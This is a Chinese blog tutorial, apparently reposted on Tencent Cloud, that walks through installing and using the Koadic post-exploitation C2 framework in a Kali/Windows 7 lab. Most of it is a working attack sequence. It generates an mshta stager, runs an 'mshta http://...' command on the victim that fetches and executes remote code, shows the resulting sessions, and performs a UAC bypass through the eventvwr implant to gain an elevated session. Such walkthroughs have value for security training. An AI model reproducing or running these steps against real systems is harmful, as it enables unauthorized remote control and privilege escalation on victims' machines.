Koadic的安装和使用

概述

Koadic是DEFCON分型出来的一个后渗透工具,主要通过vbscript、jscript进行大部分操作 废话不多说开始演示

环境准备

我准备的是两台虚拟机一台kali就是攻击机器 一台windows7 64位就是受害者了

安装

安装很简单 git clone https://github.com/zerosum0x0/koadic.git 之后安装依赖 cd koadic/ pip install -r requirements.txt

使用

运行 ./koadic

                            .
                           / \
     _                   _ | |
    | | _____   __ _  __| || |  ___
    | |/ / _ \ / _` |/ _` ||.| / __|
    |   / (o) | (_| | (_| ||.|| (__
    |_|\_\_^_/ \__,_|\__,_||:| \___|
                           |:|
                        ~\==8==/~
                            8
                            O

        -{ COM Command & Control }-
      Windows Post-Exploitation Tools
             Endless Intellect

            ~[ Version:  0x8 ]~
            ~[ Stagers:    4 ]~
            ~[ Implants:  29 ]~

(koadic: sta/js/mshta)# 

首先我们得知道这个工具的几个概念

  • Stagers 就是在你攻击的机器上生成的payload的种类
  • Implants 就是当你控制机器后可以进行的操作

具体Stagers和Implants你可以看它的github页面 https://github.com/zerosum0x0/koadic

接着我们执行 use stager/js/mshta 就是使用mshta这个stager 之后设置本机的端口和ip,进行本地监听 你可以输入info命令来查看要设置的参数 set LHOST 192.168.1.104 set LPORT 9999 接着运行 run

(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/BYhBU
[>] mshta http://192.168.1.104:9999/BYhBU

因为是后渗透工具,所以不管怎么说你肯定能在你控制的电脑上执行一条命令 在受害者机器上执行 mshta http://192.168.1.104:9999/BYhBU 我的话直接打开一个cmd执行就好了 接着会有一个python字符的坑,会出现下面这个错

(koadic: sta/js/mshta)# ----------------------------------------
Exception happened during processing of request from ('192.168.1.110', 49159)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
    self.handle()
  File "/root/koadic/core/handler.py", line 90, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
    method()
  File "/root/koadic/core/handler.py", line 169, in do_POST
    self.session.parse_user_info(data)
  File "/root/koadic/core/session.py", line 56, in parse_user_info
    data = data.decode().split("~~~")
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
----------------------------------------
[!] Zombie 0: Timed out.

就是下面这个错误 UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128) 你只要把字符编码换成utf-8就好了 怎么做呢看下面 首先退出程序 打开下面这个文件 vim koadic

添加上

import sys
reload(sys)
sys.setdefaultencoding('utf-8')

总的文件是下面这个样子的

#!/usr/bin/env python

import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# Copyright (c) 2016 - 2017 RiskSense, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use the software except in compliance with the License.
#
# You may obtain a copy of the License at:
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.

# Disclaimer:
# Usage of Koadic for attacking targets without prior mutual consent is illegal.
# It is the end user's responsibility to obey all applicable local, state,
# federal, and international laws. Developers assume no liability and are not
# responsible for any misuse or damage caused by this program.

__version_info__ = (0, 8)
__version__ = "x".join(map(str, __version_info__))
__license__ = "Apache 2.0"
__credits__ = ["zerosum0x0", "jmage", "TheNaterz", "aleph-naught-"]

if __name__ == "__main__":
    import core.shell

    banner = open("data/banner.txt", "rb").read().decode("unicode_escape")

    shell = core.shell.Shell(banner, __version__)
    shell.run()

之后重新进行上面的操作就不会报错了

                            .
                           / \
     _                   _ | |
    | | _____   __ _  __| || |  ___
    | |/ / _ \ / _` |/ _` ||.| / __|
    |   / (o) | (_| | (_| ||.|| (__
    |_|\_\_^_/ \__,_|\__,_||:| \___|
                           |:|
                        ~\==8==/~
                            8
                            O

        -{ COM Command & Control }-
      Windows Post-Exploitation Tools
             Endless Intellect

            ~[ Version:  0x8 ]~
            ~[ Stagers:    4 ]~
            ~[ Implants:  29 ]~

(koadic: sta/js/mshta)# use stager/js/mshta 
(koadic: sta/js/mshta)# set LHOST 192.168.1.104
[+] LHOST => 192.168.1.104
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/N435X
[>] mshta http://192.168.1.104:9999/N435X
[+] Zombie 0: Staging new connection (192.168.1.110)
[+] Zombie 0: WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版 
(koadic: sta/js/mshta)#

之后我们进行权限提升也就是uac bypass

输入zombies来查看我们控制的机器

(koadic: sta/js/mshta)# zombies 

    ID   IP              STATUS  LAST SEEN       
    ---  ---------       ------- ------------    
    0    192.168.1.110   Alive   2017-11-25 21:27:46

Use "zombies ID" for detailed information about a session.

输入zombies 0可以查看这台机器的详细信息

(koadic: sta/js/mshta)# zombies 0

    ID:                     0                               
    Status:                 Alive                           
    Last Seen:              2017-11-25 21:28:42             

    IP:                     192.168.1.110                   
    User:                   WIN-HK90RUM6L1B\bboysoul        
    Hostname:               WIN-HK90RUM6L1B                 
    Primary DC:             Unknown                         
    OS:                     Microsoft Windows 7 专业版         
    OSArch:                 64-bit                          
    Elevated:               No                              

    User Agent:             Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
    Session Key:            f4d7735b8a9d45a5a74ed5a63a164421

    JOB  NAME                            STATUS  ERRNO   
    ---- ---------                       ------- ------- 

可以看到Elevated这里显示no表示我们没有进行提权 输入 use implant/elevate/bypassuac_eventvwr 查看一下这个模块的信息

(koadic: imp/ele/bypassuac_eventvwr)# info

    NAME        VALUE           REQ     DESCRIPTION     
    -----       ------------    ----    -------------   
    PAYLOAD                     yes     run payloads for a list
    ZOMBIE      ALL             yes     the zombie to target

这里我们把payload和zombie设置为0,就是表示payload为0不使用,zombie的编号为0 接着run就好了

(koadic: imp/ele/bypassuac_eventvwr)# run
[*] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) created.
[+] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) completed.
[+] Zombie 1: Staging new connection (192.168.1.110)
[+] Zombie 1: WIN-HK90RUM6L1B\bboysoul* @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版 

成功 但是注意的是程序新建立了一个链接来bypass所以原来那个zombie连接虽然存在但是还是没有进行提权的用户,新建的那个连接才是进行提权过的用户,不信输入zombie看一下是不是多出了一个链接

(koadic: imp/ele/bypassuac_eventvwr)# zombies 

    ID   IP              STATUS  LAST SEEN       
    ---  ---------       ------- ------------    
    0    192.168.1.110   Alive   2017-11-25 21:43:00
    1*   192.168.1.110   Alive   2017-11-25 21:43:00

Use "zombies ID" for detailed information about a session.

看一下zombie 1的信息

(koadic: imp/ele/bypassuac_eventvwr)# zombies 1

    ID:                     1                               
    Status:                 Alive                           
    Last Seen:              2017-11-25 21:45:35             

    IP:                     192.168.1.110                   
    User:                   WIN-HK90RUM6L1B\bboysoul*       
    Hostname:               WIN-HK90RUM6L1B                 
    Primary DC:             Unknown                         
    OS:                     Microsoft Windows 7 专业版         
    OSArch:                 64-bit                          
    Elevated:               YES!                            

    User Agent:             Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
    Session Key:            c42dec18786a47f2bc4ee023dc8f69bd

    JOB  NAME                            STATUS  ERRNO   
    ---- ---------                       ------- ------- 

是提权成功的 提权成功之后的机器我们可以使用implant里所有的模块,具体的模块自己研究吧

欢迎关注Bboysoul的博客www.bboysoul.com Have Fun

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏张善友的专栏

ASP.NET MVC 1.0 RC 那些事

Scott Gu宣布了ASP.NET MVC 1.0 RC的发布, Scott Gu在blog上写了一篇ASP.NET MVC 1.0 Release Cand...

1869
来自专栏debugeeker的专栏

source insight另一个coredump

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/xuzhina/article/detai...

833
来自专栏ASP.NETCore

ASP.NET Core中的ActionFilter与DI

  前几篇文章都是讲ASP.NET Core MVC中的依赖注入(DI)与扩展点的,也许大家都发现在ASP.NET CORE中所有的组件都是通过依赖注入来扩展的...

1365
来自专栏腾讯开源的专栏

Tencent Joins the GPL Cooperation Commitment

? Hong Kong, 07 November, 2018 – Tencent, a leading provider of Internet servic...

1382
来自专栏开发与安全

win 7 + VC++ 2008 express + OpenCv 2.1.0安装

官方文档并注释: These instructions were tested with Visual C++ 9.0 (as part of Visual ...

20210
来自专栏ml

c/c++ 软件集成 安装和可卸载软件

  作为一个工程师应具备的一些能力: 1. 首先具备这款软件:     >inno  Setup      免费版还开源,良心货,妥妥的。 2. 这款软件上手也...

3757
来自专栏.NET技术

Visual Studio Package 插件开发

  这段时间公司新做了一个支付系统,里面有N个后台服务,每次有更新修改,拷贝打包发布包“不亦乐乎”。。。于是我想要不要自己定制个打包插件。

1413
来自专栏依乐祝

Net Core平台灵活简单的日志记录框架NLog+SqlServer初体验

这里大家可能会问,为什么没有Debug信息输出呢,这是因为我们上面NLog配置设置的记录日志的最低级别为Info.所以比Info级别小的Debug信息不会记...

881
来自专栏张善友的专栏

在Mono 2.8上部署ASP.NET MVC 2

Mono 2.8发布:C#4.0和更好的性能,我们知道Mono 2.8对ASP.NET MVC 2的完全支持,下面我们就来测试下在Mono 2.8上部署ASP....

2095
来自专栏dotnet & java

又是一个Notepad++的问题

昨天刚刚解决了Style Configurator无法保存的问题,今天继续解决另一个。

793

扫码关注云+社区

领取腾讯云代金券